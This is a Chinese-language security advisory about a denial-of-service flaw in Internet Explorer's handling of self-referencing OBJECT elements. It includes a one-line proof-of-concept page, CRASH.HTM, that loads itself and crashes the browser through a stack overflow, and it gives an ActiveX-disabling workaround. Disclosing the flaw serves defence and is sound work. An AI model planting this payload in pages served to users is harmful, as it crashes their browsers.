IE自引用目录DOS漏洞

/ns/ld/softld/data/20020513024256.htm

涉及程序:
IE Self-Referenced Directives

描述:
IE自引用目录DOS漏洞

详细:
大部分IE版本的自引用目录(Self-Referenced Directives)存在拒绝服务漏洞。

在IE中OBJECT element通常被用来在HTML文档中嵌入OLE(object link and enbed).

IE浏览器在处理自引用目录(Self-Referenced Directives,也常译成自我参照目录)时存在漏洞,因为这些目录允许将它自己以一定的方式加载到一个OBJECT中,或允许在其目录中含有可导致相互依赖object循环(loop)的页面。

攻击者如果成功利用这些漏洞进行导致拒绝服务攻击的话,将会导致IE的彻底崩溃。


以下仅仅用来测试和研究这个漏洞,如果您将其用于不正当的途径请后果自负


---------------------------------
The Exploit:

---- [ CRASH.HTM ] ----
<OBJECT DATA="CRASH.HTM" TYPE="text/html"></OBJECT>
---- [ CRASH.HTM ] ----

这样IE 将会在shdocvw.dll动态链接库中因为堆栈溢出(stack overflow)而崩溃。
---------------------------------



解决方案:
临时方案:
将所有的"Run ActiveX Controls and Plugins"项禁止